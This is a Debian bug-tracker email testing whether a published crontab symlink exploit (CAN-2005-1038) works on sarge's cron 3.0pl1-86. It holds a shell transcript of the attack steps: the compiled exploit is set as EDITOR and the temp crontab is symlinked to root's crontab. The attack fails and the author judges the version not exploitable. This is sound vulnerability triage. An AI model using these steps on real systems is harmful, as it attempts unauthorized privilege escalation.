tags 306004 -sarge thanks This one time, at band camp, Helge Kreutzmann said: > The report on http://lwn.net/Articles/132380/ (and in the CVE) states, > that this problem only relates to version 4.1. If this is the case, > then plase add CAN-2005-1038 to
(code from http://www.securityfocus.com/archive/1/395093) [EMAIL PROTECTED]:~$ vi cron_attack.c [EMAIL PROTECTED]:~$ gcc -o cron_attack cron_attack.c [EMAIL PROTECTED]:~$ crontab -l * * * * * /bin/true [EMAIL PROTECTED]:~$ sudo crontab -e crontab: installing new crontab [EMAIL PROTECTED]:~$ sudo crontab -l * * * * * /bin/true || /bin/false [EMAIL PROTECTED]:~$ crontab -l * * * * * /bin/true [EMAIL PROTECTED]:~$ EDITOR=/home/steve/cron_attack crontab -e /tmp/crontab.CfI54m/crontab [EMAIL PROTECTED]:/tmp$ rm /tmp/crontab.CfI54m/crontab [EMAIL PROTECTED]:/tmp$ ln -s /var/spool/cron/root /tmp/crontab.CfI54m/crontab [EMAIL PROTECTED]:/tmp$ exit Can't open tempfile after edit: No such file or directory Error while editing crontab [EMAIL PROTECTED]:~$ crontab -l * * * * * /bin/true Similarly, trying to get to the real file: [EMAIL PROTECTED]:/tmp$ rm /var/spool/cron/crontabs/steve rm: cannot lstat `/var/spool/cron/crontabs/steve': Permission denied [EMAIL PROTECTED]:~$ dpkg -l cron Desired=Unknown/Install/Remove/Purge/Hold | Status=Not/Installed/Config-files/Unpacked/Failed-config/Half-installed |/ Err?=(none)/Hold/Reinst-required/X=both-problems (Status,Err: uppercase=bad) ||/ Name Version Description +++-=======-===============-=========================================== ii cron 3.0pl1-86 management of regular background processing Also tested on sid - not exploitable with this exploit. -- ----------------------------------------------------------------- | ,''`. Stephen Gran | | : :' : [EMAIL PROTECTED] | | `. `' Debian user, admin, and developer | | `- http://www.debian.org | -----------------------------------------------------------------
pgp1eGw67YrEk.pgp
Description: PGP signature